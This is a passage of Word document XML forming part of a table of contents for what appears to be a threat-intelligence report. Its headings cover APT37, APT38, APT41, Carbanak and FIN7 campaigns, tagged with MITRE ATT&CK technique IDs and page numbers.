              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480866" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.9</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APT37</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480866 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>84</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="173C7245" w14:textId="53AF44CE" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480867" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.9.1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_Toc153480867 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>84</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04F89178" w14:textId="1E6D1C06" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480868" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.9.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1189 - Nation-state Hackers Target Journalists with Goldbackdoor Malware</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480868 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>85</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4EF1583F" w14:textId="2F2E344D" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480869" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.10</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APT38</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480869 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>90</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BD356CF" w14:textId="5B53C2B6" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480870" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.10.1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_Toc153480870 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>90</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15B60896" w14:textId="04A713DB" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480871" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.10.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001 - FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480871 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03741D9D" w14:textId="20D0F6F3" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480872" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.11</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APT 41</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480872 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>104</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18A0CF94" w14:textId="5D797340" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480873" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.11.1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_Toc153480873 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>104</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C481570" w14:textId="45C1771D" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480874" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.11.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Double Dragon APT41, a dual espionage and cyber crime operation – ASUS Attack</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480874 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>105</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="246B5E21" w14:textId="60CB1A0F" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480875" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.11.3</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Double Dragon APT41, a dual espionage and cyber crime operation – ASUS Attack</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480875 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>108</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4606D5F4" w14:textId="0C873700" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480876" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.12</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Carbanak</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480876 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>111</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F4AD3CD" w14:textId="34E40EB2" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480877" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.12.1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_Toc153480877 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>111</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44AC1100" w14:textId="72ECC843" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480878" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.12.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001 , T1189, T1078 - CARBANAK APT THE GREAT BANK ROBBERY</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480878 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>111</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18150950" w14:textId="0E197763" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480879" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.13</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>FIN7</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480879 \h </w:instrText>
            </w:r>
